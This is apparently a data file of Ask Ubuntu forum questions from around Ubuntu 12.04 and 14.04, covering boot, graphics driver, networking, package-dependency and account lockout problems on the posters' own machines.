465033	locked out of my account	ok , so i 've been messing around with my linux installation , and i 've really kind of messed up . i changed the ~/.gnomerc to open an application , but there was a problem : after it opened that application , it did n't do anything else . the rest of the screen was black , until i closed the appication . then it just ran normally . `` ok , '' i figured , `` i 've seen scripts have 'exit 0 ' after they were done executing , so maybe i need to add that . '' well , as you can imagine , i still have the same behaviour with the application , but now , when i close the application , it logs me out of my computer . so i can no longer edit the ~/.gnomerc file to fix it . my solution so far is to somehow log into the root user bash in order to edit the file . is there some way to do that ? can i log into my other account via terminal in order to edit that file ? can i somehow run the computer in `` safe mode '' or something and edit the file ? thanks in advance . any help is greatly appreciated .
465035	trouble with vga and 14.04 to display on smart tv	i 'm trying to connect my laptop running 14.04 with a smart tv . all that is displayed is is the ubuntu title bar and a black wallpaper . settings say i 'm connected to a goldstar 72 '' display but it 's a smaller lg tv . how do i go about getting it to work properly ?
465036	clear .cache tracker directory in ubuntu ?	i created a partition for ubuntu and i just ran out of space a couple days ago . i used the disk usage analyzer and i realized that for some reason the directory /home/.cache uses up a lot of disk space ; specifically the tracker folder . i was wondering what is recommended to do in order to prevent this cache and tracker folder to grow so much ?
465038	will not boot after installing 14,04	installed 14.04 on 60 gig ssd drive no errors . os shows drive and boot is set for hdd group . but will not boot . i left it running and dont know why it finally showed up with ubuntu sign in prompt and after entering password i was at the desktop . have not been able to get it to boot up since . it want 's me to connect a boot drive .
465039	looking for assistance with graphic card dtriver . help	i am using a galaxy nvidia geforce gt610 graphics card on my console while running the ubuntu 14.04lts os . i am confused . i need to figure out which of the drivers would be the best that apear to use in the list of drivers available ... . ? ? someone . please help me .
465042	how do i get my computer to boot a specific partition ?	my computer has an interesting setup ... i have a partition layout that goes like this : 30gb ext4 that i want to boot from , 130gb part ext4 with corrupted drivers ( mouse and network are completely offline ) that i had originally made as a copy of the 30gb and originally wanted to boot to but now is almost beyond repair but i want to use the home folder on this with the 30gb as the root partition , a 140gb ntfs that i want to install windows 7 on for gaming , and a 1gb partition at the start of the drive that i 'd like to use as a grub/boot partition . the other interesting but annoying thing is that the two ext4 partitions seem to irregularly alternate upon reboot , and even a grub boot disk sometimes confuses them . i want to make the 130gb partition not boot , but use it as a home partition for the 30gb one , and have the boot loader installed to the 1gb one at the start of the disk for future expantion and flexibility .
465043	booting with intel graphics , random crashes with nvidia . can anyone help me decipher my syslog ?	so here 's what 's happening in the log : i boot up my computer with intel graphics , then i switch ( nvidia prime ) to nvidia graphics . my computer has been randomly shutting off while using nvidia . almost immediately , the system shuts off . i 've attached the syslog , can anyone tell me what 's wrong ? note : this problem ( crashes on nvidia ) have carried over from reinstalls and upgrades to newer versions of ubuntu . i have a great fan ( coolermaster ) and the laptop appears cool to the touch . http : //pastebin.com/weatd3sx
465044	2gpus and fglrx	when i run fgl_glxgears on the monitor sitting off of gpu1 i get about 1500fps but if i drag fgl_glxgears to the second monitor sitting of gpu2 fps drop to about 300 . both gpus are the same model . looks like hardware acceleration is running on one gpu but not the other ? how can i check ? $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 2600 xt opengl version string : 3.3.11672 compatibility profile context $ sudo lshw -c video *-display description : vga compatible controller product : rv630 xt [ radeon hd 2600 xt ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:49 memory : c0000000-cfffffff memory : fe6e0000-fe6effff ioport : a000 ( size=256 ) memory : fe6c0000-fe6dffff *-display description : vga compatible controller product : rv630 xt [ radeon hd 2600 xt ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:04:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:50 memory : d0000000-dfffffff memory : fe9e0000-fe9effff ioport : d000 ( size=256 ) memory : fe9c0000-fe9dffff
465046	unable to change almost any configuration from my desktop	first , apologies for my english . well , my problem is that if i ca n't change any configuration . some examples : 1-ca n't unlock any apps from the launcher . 2-ca n't disable online searchs on the dash . 3-ca n't change the desktop background ( some details on this : i actually tried to cheat the system and i renamed one of the jpg files that were in /usr/share/backgrounds and now the background is black . ) 4-ca n't change any parameters from the mouse & touchpad . well ... i can keep trying to change things but i think that the point is clear . some things that do change are the resolution of the screen and the volume . i also tried to use programs to modify the configuration but no luck either . the programs are : unity tweak tool , compizconfig-settings-manager and alternatives configurator . some relevant info : i 'm using ubuntu 14.04 ( 64 ) , yesterday i did a fresh install of it . previously i had ubuntu 13.10 and decided to install win7 and ubuntu 14.04 because sometimes i need excel and other things . i installed win7 first and then ubuntu with a burned dvd . when i rebooted the screen got freezed after the login . i had experimented this problem before and my last solution was to switch linux kernels ( to al older one ) at start up and do n't install propietary drivers . now i did not had that option so i proved a lot of things , the final changes were that now i 'm using linux kernel 3.14.3-031403-generic and open source drivers . my laptop is a dell vostro 3400 with a i5 processor and a geforce 310m graphic card . i also changed the hhd for a ssd . i think that the problem is related with the fact that i installed lubuntu-desktop package to have a graphical interface to solve my problems with unity . that 's it . i would ask to deliver a solution that is not reinstall ubuntu ( if posible ) because it took me many hours to be able to log in . unless there 's anyone who can make the installation work with no problems in less than a couple of hours . again , forgive my for the bad english . thanks in advice . ignacio edit : i solved the problem . i will post the steps here , maybe someone could use them . 1.fresh install . roboot 2.find that i have the same problem that before , reboot in recovery mode . 3.conect via cable , activate the netwoprking 4.open a root shell : sudo apt-get update , sudo apt-get upgrade 5 . ( many useless things ) 6 . then , in a console : sudo apt-get purge nvidia* sudo add-apt-repository ppa : bumblebee/stable sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia sudo dpkg-reconfigure nvidia-current sudo reboot and worked like a charm
465048	how do i have a headless machine share its wireless connection through ethernet ?	i 'm finding a lot of information on how to do this using a gui . here is my current setup : -network shared through wireless router -computer has wireless connection -want computer to share this wireless connection over ethernet while also being able to share nfs how would i go about doing this ? i 'm at my wit 's end ! ! !
465052	trying to boot from windows cd goes to grub	i am trying to boot from disk using the windows installation cd , and i always get the grub menu . here is the boot-repair . is there any other information you would need ? booting from a gparted disk or an ubuntu disk works fine . i usually select boot from the dvd drive using f12 , and i 've also changed settings in the bios , but i only get the grub screen , the same as if i was booting from the hard drive . also , some background information on windows issues : windows crashed and trying to boot in safe mode or normal mode simply restarted the computer . from the grub menu the windows recover option brings me to a stock wallpaper and a mouse i ca n't move before shutting down . i recently deleted a windows partition , but the problem existed before this . what would happen if i deleted other windows partitions ? i do seem to be having trouble with the disk in another computer . it was simply the disk . i was able to install windows vista , but i installed ubuntu over it as i 've come to enjoy the os .
465055	dual boot 14.04 alongside win8	so i 'm running a fresh install of win8 on a 60gb ssd with a another 300hdd for storage . i have set a 20gb space for the installation of ubuntu alongside win . the issue is when i run the dvd with ubuntu for installation it shows that there is no other os even though i just restarted from windows desktop ... i do n't have secure boot and my fast start up is turned off . mobo is a sabertooth 990fx r2.0
465063	unknown password	in the seccion of my account password . i put account disabled . and now my laptop ask me for a password to upgrade . but the password i used is not the same . says it is incorrect . what is the password if the account is disabled
465065	will encrypting hard drive encrypt `` deleted '' data	when a file is `` deleted '' it is not truely deleted , of course . i was on windows 8.1 . anyway , i accidentally screwed something up which led to more screw-ups which led to an unbootable hard drive and the `` deletion '' of all my files ( i 'm sure those files are not truly erased ) . fortunately , i had a ubuntu cd lying around to install a new os . upon installation , i used the native disk encryption and chose a 20+ character password . i did not select `` overwrite hard drive '' because i was afraid it would take too long . it did n't take too long to install and restart , so i 'm wondering whether a secure encryption algorithm was used ( trucrypt takes much longer ) . most importantly , i had about 200gb+ data on my hard drive before this and i am wondering if those `` deleted '' files are also encrypted . in other words are those `` deleted '' files safe even though they were from a bygone era and different os . i mean how could it have encrypted all those hidden files so fast ? i immediately used bleach bit to delete all `` free space , '' but idk man you ca n't be sure .
465067	macbook air wireless nic drivers installed , not finding networks	i will keep this intro short and mostly just post terminal output . just installed lubuntu 14.04 on original macbook air alongside os x using refind . lubuntu boots properly , but i can not connect to networks / internet from within lubuntu ( os x networking working fine still ) . note : there is no ethernet port so i am not connected to internet on the macbook . i installed drivers for the broadcom wireless adapter with the package 'ndiswrapper-dkms ' ( had to place .deb and dependencies on usb stick ) . i have tried using the wifi help pages here : 'help.ubuntu.com/community/wifidocs/wirelesstroubleshootingguide ' but have found no obvious problems . based on the output of the networking commands , lubuntu recognizes the wifi adapter , and nm-tool even finds available networks . but the network connections app in lubuntu will not find any networks or connect to them . the output of many networking commands ( nm-tool , ifconfig , lshw -c network , lsmod , iwconfig , rfkill list , sudo ndiswrapper -l ) is below : -- -- -- -- -- root @ atheiman-macbookair : ~ # nm-tool networkmanager tool state : disconnected - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : wl state : disconnected default : no hw address : 00:1e : c2 : b6:6a : f1 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points 112naukystjo : infra , 84:1b:5e : b2:37 : e5 , freq 2437 mhz , rate 54 mb/s , strength 94 wpa wpa2 senator2 : infra , 00:26 : f2 : ca:1d : aa , freq 2462 mhz , rate 54 mb/s , strength 32 wpa c68171 : infra , 10:0d:7f : c6:81:71 , freq 2437 mhz , rate 54 mb/s , strength 27 wpa wpa2 att504 : infra , b0:77 : ac:16:74:40 , freq 2412 mhz , rate 54 mb/s , strength 24 wpa wpa2 bbkwifi : infra , 7c:05:07:21:06:75 , freq 2412 mhz , rate 54 mb/s , strength 15 wpa wpa2 piglet : infra , c4:04:15:3a:05:66 , freq 2462 mhz , rate 54 mb/s , strength 20 wpa2 -- -- -- -- -- root @ atheiman-macbookair : ~ # ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:560 errors:0 dropped:0 overruns:0 frame:0 tx packets:560 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:44576 ( 44.5 kb ) tx bytes:44576 ( 44.5 kb ) wlan0 link encap : ethernet hwaddr 00:1e : c2 : b6:6a : f1 inet6 addr : fe80 : :21e : c2ff : feb6:6af1/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:19 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 -- -- -- -- -- root @ atheiman-macbookair : ~ # lshw -c network *-network description : wireless interface product : bcm4321 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 05 serial : 00:1e : c2 : b6:6a : f1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:16 memory:90300000-90303fff -- -- -- -- -- root @ atheiman-macbookair : ~ # lsmod | grep wl wl 4207846 0 lib80211 14381 2 wl , lib80211_crypt_tkip cfg80211 484040 1 wl -- -- -- -- -- root @ atheiman-macbookair : ~ # sudo iwconfig lo no wireless extensions . wlan0 ieee 802.11abg essid : off/any mode : managed access point : not-associated tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off -- -- -- -- -- root @ atheiman-macbookair : ~ # rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no -- -- -- -- -- i had originally tried downloading the drivers for the broadcom wireless adapter from support.apple.com 's bootcamp support files and then installing them using the commands unrar broadcomcardreader64.exe sudo ndiswrapper -i b5csisda.inf sudo ndiswrapper -m sudo modprobe ndiswrapper but gave up on that after trying all the drivers listed below and rebooting after each . currently , i think the system is using none of the drivers i received from apple.com based on the output below . i do still have all the .exe drivers from apple if needed though . -- -- -- -- -- root @ atheiman-macbookair : ~ # sudo ndiswrapper -l -- -- -- -- -- root @ atheiman-macbookair : /home/atheiman/downloads # l bootcamp5.1.5621.zip broadcom-com-controller-64/ broadcom-wireless-legacy-64/ broadcom-wireless-win8x-64/ broadcom-card-reader-64/ broadcom-ethernet-64/ broadcom-wireless-win7x-64/ root @ atheiman-macbookair : /home/atheiman/downloads # ls broadcom-card-reader-64/ broadcomcardreader64.exe bscsisda.cat bscsisda.inf bscsisda.sys dpinst.exe dpinst.xml release.txt -- -- -- -- -- thank you for at least reading this far , can someone please help me connect to a network ! based on the output of nm-tool finding my home network , i must be very close to connecting the macbook to the internet !
465068	how to contact canonical ?	so i am doing a college research project for my computer information systems department and it is about alternative linux server distribution for small businesses . from my findings i would really like for this research to actually take off into a distribution project ( using ubuntu as a base os ) . however i would like to rename the distribution as `` bizbuntu '' or something related to that ( `` biz '' being shorthand for business ) however i do n't know if i can name the distribution without consent from canonical . so my question is do i have to contact canonical about this , if so , does anyone know a mailing list or email that i can contact them about this ?
465074	laravel loading error in ubuntu 14.04	when i tried to access my laravel after successfull updation , instead of the default page it shows an error in the webpage . mcrypt php extension required . i have tried some fixes like this , sudo ln -s /etc/php5/conf.d/mcrypt.ini /etc/php5/apache2/conf.d/20-mcrypt.ini ln : failed to create symbolic link ‘/etc/php5/apache2/conf.d/20-mcrypt.ini’ : file exists sudo service apache2 restart
465076	how do you install khexedit in ubuntu ? i couldnt not find it	does anyone know how to install khexedit in ubuntu 14.04 ? its in the hardy manpages here : http : //manpages.ubuntu.com/manpages/hardy/man1/khexedit.1.html how can i get it in ubuntu 14.04 ?
465079	upgraded from 12.04 lts to 14.04 lts , spamassassin upgrade issue	i recently upgraded my server from 12.04 lts to 14.04 lts . mostly everything went well . however one thing is n't working for me and i 'm trying to figure out what i missed . i re-visited the settings and confirmed they were set to what i had before the upgrade , but now when spamassassin tries to update at night my cron job emails me this : /etc/cron.daily/spamassassin : gpg : warning : unsafe ownership on homedir `/var/lib/spamassassin/sa-update-keys' gpg : failed to create temporary file `/var/lib/spamassassin/sa-update-keys/. # lk0x16728d0.mail.nomorestars.com.13916 ' : permission denied gpg : keyblock resource `/var/lib/spamassassin/sa-update-keys/secring.gpg ' : general error gpg : failed to create temporary file `/var/lib/spamassassin/sa-update-keys/. # lk0x16728d0.mail.nomorestars.com.13916 ' : permission denied gpg : keyblock resource `/var/lib/spamassassin/sa-update-keys/pubring.gpg ' : general error gpg : no writable keyring found : eof gpg : error reading `/usr/share/spamassassin/sa-update-pubkey.txt ' : general error gpg : import from `/usr/share/spamassassin/sa-update-pubkey.txt ' failed : general error gpg : process '/usr/bin/gpg -- homedir='/var/lib/spamassassin/sa-update-keys ' -- batch -- no-tty -- status-fd=1 -q -- logger-fd=1 -- import ' finished : exit 2 i 've checked and the user account settings and permissions appear correct . any suggestions on where i can look ? i 'm sure it 's something that was changed permission by the upgrade i just ca n't seem to locate it .
465084	e : the package linux-image-3.5.0-49-generic needs to be reinstalled , but i ca n't find an archive for it	i am not a command line person , but , i know i need to use it sometimes ... i am absolutely lost i tried following some directions to repair the above heading . this seems to have worked to some extent , however , now it is far worse there are a few packages broken . i tried to upgrade and it seemed to install quite a bit , but when i run eddie @ freewill : ~ $ sudo apt-get check reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libc-dev-bin : depends : libc6 ( > 2.17 ) but 2.15-0ubuntu20.2 is installed libc6-dev : depends : libc6 ( = 2.17-93ubuntu4 ) but 2.15-0ubuntu20.2 is installed e : unmet dependencies . try using -f. eddie @ freewill : ~ $ apt-get -f install e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? eddie @ freewill : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : exo-utils libexo-1-0 libexo-common libexo-helpers libgarcon-1-0 libgarcon-common libkeybinder0 libthunarx-2-0 libtumbler-1-0 linux-headers-3.5.0-17 thunar-data tumbler tumbler-common xfce4-settings xfce4-volumed xfdesktop4 xfdesktop4-data use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libc6 linux-image-3.11.0-20-generic linux-image-3.5.0-49-generic suggested packages : glibc-doc fdutils linux-doc-3.11.0 linux-source-3.11.0 linux-tools linux-headers-3.11.0-20-generic linux-lts-quantal-doc-3.5.0 linux-lts-quantal-source-3.5.0 linux-lts-quantal-tools linux-headers-3.5.0-49-generic the following packages will be upgraded : libc6 linux-image-3.11.0-20-generic linux-image-3.5.0-49-generic 3 upgraded , 0 newly installed , 0 to remove and 1397 not upgraded . 25 not fully installed or removed . need to get 59.9 mb of archives . after this operation , 198 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //us.archive.ubuntu.com/ubuntu/ saucy/main libc6 amd64 2.17-93ubuntu4 [ 4,730 kb ] get:2 http : //security.ubuntu.com/ubuntu/ precise-security/main linux-image-3.5.0-49- generic amd64 3.5.0-49.74~precise1 [ 40.7 mb ] get:3 http : //us.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-image-3.11.0-20- generic amd64 3.11.0-20.35 [ 14.5 mb ] fetched 59.9 mb in 54s ( 1,091 kb/s ) debconf : perl may be unconfigured ( ca n't locate warnings/register.pm in @ inc ( @ inc contains : /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl . ) at /usr/share/perl/5.14/vars.pm line 7 . begin failed -- compilation aborted at /usr/share/perl/5.14/vars.pm line 7 . compilation failed in require at /usr/lib/perl/5.14/file/spec.pm line 4 . begin failed -- compilation aborted at /usr/lib/perl/5.14/file/spec.pm line 4 . compilation failed in require at /usr/lib/perl/5.14/io/file.pm line 12 . begin failed -- compilation aborted at /usr/lib/perl/5.14/io/file.pm line 12 . compilation failed in require at /usr/share/perl/5.14/filehandle.pm line 9 . compilation failed in require at ( eval 1 ) line 3 . begin failed -- compilation aborted at ( eval 1 ) line 3. ) -- aborting ( reading database ... 173564 files and directories currently installed . ) preparing to replace libc6 : amd64 2.15-0ubuntu20.2 ( using ... /libc6_2.17- 93ubuntu4_amd64.deb ) ... ca n't locate warnings/register.pm in @ inc ( @ inc contains : /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl . ) at /usr/share/perl/5.14/vars.pm line 7 . begin failed -- compilation aborted at /usr/share/perl/5.14/vars.pm line 7 . compilation failed in require at /usr/share/perl/5.14/base.pm line 4 . begin failed -- compilation aborted at /usr/share/perl/5.14/base.pm line 4 . compilation failed in require at /usr/share/perl5/debconf/log.pm line 7 . begin failed -- compilation aborted at /usr/share/perl5/debconf/log.pm line 7 . compilation failed in require at /usr/share/perl5/debconf/db.pm line 7 . begin failed -- compilation aborted at /usr/share/perl5/debconf/db.pm line 7 . compilation failed in require at /usr/share/debconf/frontend line 6 . begin failed -- compilation aborted at /usr/share/debconf/frontend line 6. dpkg : error processing /var/cache/apt/archives/libc6_2.17-93ubuntu4_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/libc6_2.17-93ubuntu4_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
465088	access data disk on same machine from linux for writing	ca n't access data disk on the same machine from linux for writing . error mounting /dev/sdc1 at /media/armin/1t_20131122 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdc1 '' `` /media/armin/1t_20131122 '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sdc1 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
465089	ubuntu 14.04 as guest in windows 7 virtualbox : error occurs after installing guest additions	i 've tried several times now to install ubuntua 14.04 as a guest os in a windows 7 virtualbox host , and the first sign that something goes wrong is an `` internal error '' that ubuntu first reports after i install the guest additions , followed later by a failure when booting ubuntu ( virtualbox crashes ) . the error i 'm getting is as follows ( note : this first occurs after installing the guest additions ) ( second note : it mentions some packages are obsolete . does that sound like the real reason ? how do i upgrade these packages ? [ sorry for my linux newbieish ] ) errors : sorry ubuntu 14.04 has experienced an internal error . executablepath /usr/lib/libgnome-desktop-3-7/check_gl_texture_size package libgnome-desktop-3-7 3.8.4-0ubuntu3 problem type crash title check_gl_texture_size crashed with sigsegv apportversion 2.14.1-0ubuntu3 arhitecture i386 coredump ( binary data ) date < today 's date > dependencies < very long list > disassembly # 0 0xb71e9120 in ? ? ( ) from /usr/lib/i386-linux-gnu/dri/swrast_dri_so no symbol table info available . connot access memory at address 0x592a8c15 distrorelease ubuntu 14.04 installation media ubuntu 14.04 lts `` trusty tahr '' - release i386 ( 20140417 ) packagearchitecture i386 proccmdline /usr/lib/libgnome-desktop-3-7/check_gl_texture_size .. skipping some stuff .. segvanalysis failure : invalid literal for int ( ) with base 16 : 'symbol' signal 11 unreportablereason you have some obsolete package versions installed . please upgrade dpkg , initramfs-tools , initramfs-tools-bin , libelf1 , libfreetype6 , libguddev-1.0-0 , libjbig0 , libpam-systemd , libselinux1 , libsystemd-daemon0 , libsystemd-login0 , libtiff5 , libudev1 , systemd-services , udev upgradestatus no upgrade log present ( probably fresh install ) usergroup adm cdrom dip lpadmin plugdev sambashare sudo
465090	14.04 does n't mount digital camera	i have a kodak digit camera that always has just mounted . since 14.04 , it shows the device itself in lsusb . looking in syslog i see it recognizes the camera but then fails saying the device is not an mtp . the exact log entries are : may 9 21:57:12 davelaptop kernel : [ 1733.117649 ] usb 3-3 : new full-speed usb device number 3 using ohci-pci may 9 21:57:12 davelaptop kernel : [ 1733.316743 ] usb 3-3 : new usb device found , idvendor=040a , idproduct=05d1 may 9 21:57:12 davelaptop kernel : [ 1733.316760 ] usb 3-3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 may 9 21:57:12 davelaptop kernel : [ 1733.316769 ] usb 3-3 : product : kodak easyshare c182 digital camera may 9 21:57:12 davelaptop kernel : [ 1733.316778 ] usb 3-3 : manufacturer : eastman kodak company may 9 21:57:12 davelaptop kernel : [ 1733.316785 ] usb 3-3 : serialnumber : c182 020552828 may 9 21:57:12 davelaptop mtp-probe : checking bus 3 , device 3 : `` /sys/devices/pci0000:00/0000:00:12.0/usb3/3-3 '' may 9 21:57:12 davelaptop mtp-probe : bus : 3 , device : 3 was not an mtp device may 9 21:57:12 davelaptop colord : device added : sysfs- ( null ) i also checked in udev and found some entries in hwdb folder about gphoto . it did not have my camera listed . i added it to 2 such rules files in that folder but it still does n't mount . my thought - i think something changed in udev and is messing this up . i know there is a process there about probing mtp - perhaps that is failing also/instead ? i see this is not a unique problem . there are lots of posts here and in the ubuntu forums about cameras not mounting . something is in common - some change from 13.10 to 14.04 is in common .
465091	i installed 12.04 , worked great , installed updates , everything ( everything ! ) broke	so , i just installed ubuntu 12.04 on an old desktop . it worked great , wifi , aptitude , printing , wine , everything i like about linux basically . but then it notified me there were updates available ( these were n't os updates , i 'm not upgrading from an lts to a eol ) . so i hit the install button , it downloaded and installed about 200mb worth of stuff , most of it related to the printing service and perl . rebooted , everything worked . so far , so good . but then i noticed my network icon was missing . by missing , i mean missing , it would n't connect via lan , wifi , bluetooth , nothing . i tried the terminal . it would n't recognize any commands but hostname and hostname -f , and it would arbitrarily require or not require me to type another leading $ . i tried anything sudo and it would just hang . the line moved down as if i 'd done nothing but hit enter , it did n't even ask for a password . except now it was n't listing the directory . so i tried file manager to see if i could edit some stuff manually . it denied me access to everything , and by that i mean everything . documents , downloads , even the desktop . no way i was getting into /etc/ or anything fancy like that . it was like the entire file system became read only . so in an attempt to install ndisgtk and wrapper via the .deb file and maybe at least get my wifi back , i put my flash drive in and looked for it in file manager , on the menu bar , on the desktop . nothing . anywhere . just to make sure it recognized my flash drive , i typed lsusb into the terminal ( the other of the commands it recognizes , there are seriously maybe 2 at best ) . not only was my flash drive there , but so was my wifi adapter ! i have an administrator account , but it looks like i 've been denied permission to even try to do anything but look at the pretty desktop picture . as i type all the other status bar icons except the clock and shut down button have just also disappeared . speaking of shut down , i think that 's what i 'll do to the stupid thing right now , so i 'm not wasting electricity on pretty colors . so anyway , is there anyway i can fix this , or should i do a clean install off my ubuntu 12.04 flash drive and just not update , since linux is basically virus free ? also , is there a specific set of updates doing this , that i can just uncheck and still be secure/up to date ? btw it 's an e-machines t3124 , came with windows xp home edition . i upgraded the ram to about 1gb and replaced a broken cd drive , but other than that no mods that could cause problems .
465099	ubuntu 14.04 bad taint on xfs and btrfs	i 've done a fresh install of ubuntu 14.04 on a physical machine and a virtual machine and after the first reboot ( and also at random times ) on the screen i get a bad taint message for xfs and btrfs modules . i do n't currently have any xfs or btrfs fs 's but would like to . can someone tell me what this means , if it is safe to use the system like this , and if there is a way to stop these error messages ?
465100	getting error with archive manager	i downloaded a big .iso file ( 8gb ) and it does not seem to work . when i tried to extract the same with archive manager , i am getting attached error . is my .iso file corrupt ? i also tried to check the file with sha256sum command . i am getting the hexadecimal code , but there was no verification file provided by the site to verify . ( i think there needs to be some verification file to verify the code that was generated , is it correct ? )
465101	can not lower brightness in ubuntu 14.04 with amd drivers	so i can not adjust my brightness at all . it is always at the max and i have tried updating the grub with acpi_osi=linux & acpi_backlight=vendor & acpi_osi= & acpi_osi=linux acpi_backlight=vendor . whenever i use the vendor the brightness bar just disappears from bightness and lock panel and i can not use brightness key to get the bar . i 'm not sure what i should do to fix this . i have also reinstalled my video drivers from amd . but have had no luck .
465104	how is entropy gathered for /dev/random in precise	with a standard install of ubuntu 12.04 how is the entropy for /dev/random gathered . is the install smart enough set up any hardware generation available , will it use user based sources like keyboard interupts by default ? edit : just to be clear , i 'm looking for the specific configuration that comes with the install ( or how to find it ) , i 'm not looking how it might be done in theory .
465106	tried fglrx and other question 's answers , graphics still not working right . ( 12.04 )	i 've tried every suggestion that i 've looked at online . my card is a radeon hd 4250 . i 've installed fglrx to no avail . after install i just either go into low graphics mode or it will detect my card as vesa : rs880 and none of my games will work that use 3d . i 've done terminal install of fglrx and even used amd 's site , both of which do not work . i looked into jockey and additional drivers and it shows nothing . i 'm not sure what 's going on , but my old roommate had it working at one point . i did a fresh install and can not figure out how to get it back to playing games . i 'd appreciate any help or anyone pointing me in the right direction . as i said , i 've tried everything i can search so far and nothing has helped , hence the new question .
465108	xdot python script for viewing graphs generated by graphviz is not working on ubuntu 14.04	after upgrading my system to ubuntu 14.04 i am not able to open graphs generated by graphviz using xdot . prior to that i was using ubuntu 12.04 and there was no problem of such sort observed . below is the sample error trace : file `` /usr/bin/xdot '' , line 4 , in xdot.main ( ) file `` /usr/lib/python2.7/dist-packages/xdot.py '' , line 1947 , in main win.open_file ( args [ 0 ] ) file `` /usr/lib/python2.7/dist-packages/xdot.py '' , line 1881 , in open_file self.set_dotcode ( fp.read ( ) , filename ) file `` /usr/lib/python2.7/dist-packages/xdot.py '' , line 1863 , in set_dotcode if self.widget.set_dotcode ( dotcode , filename ) : file `` /usr/lib/python2.7/dist-packages/xdot.py '' , line 1477 , in set_dotcode self.set_xdotcode ( xdotcode ) file `` /usr/lib/python2.7/dist-packages/xdot.py '' , line 1497 , in set_xdotcode self.graph = parser.parse ( ) file `` /usr/lib/python2.7/dist-packages/xdot.py '' , line 1167 , in parse dotparser.parse ( self ) file `` /usr/lib/python2.7/dist-packages/xdot.py '' , line 977 , in parse self.parse_graph ( ) file `` /usr/lib/python2.7/dist-packages/xdot.py '' , line 986 , in parse_graph self.parse_stmt ( ) file `` /usr/lib/python2.7/dist-packages/xdot.py '' , line 1032 , in parse_stmt self.handle_node ( id , attrs ) file `` /usr/lib/python2.7/dist-packages/xdot.py '' , line 1142 , in handle_node shapes.extend ( parser.parse ( ) ) file `` /usr/lib/python2.7/dist-packages/xdot.py '' , line 612 , in parse w = s.read_number ( ) file `` /usr/lib/python2.7/dist-packages/xdot.py '' , line 494 , in read_number return int ( self.read_code ( ) ) valueerror : invalid literal for int ( ) with base 10 : '206.05' can somebody help me to resolve this issue ?
465109	where should i put my script so that i can run it by a direct command ?	where can ( should ) i put my ( bash ) script so that it can be used ( forever ) by terminal or by a direct command : alt+f2 ? i know there is /usr/bin and /sbin & /bindirectories but when should i use between them ? where should i put my script ?
465110	recovering the encryption password method	my question is that i am installing the ubuntu 12.04 and gave the encryption password at the time of installation but i forget the encryption password so how to recover or change the password without formating the partition .
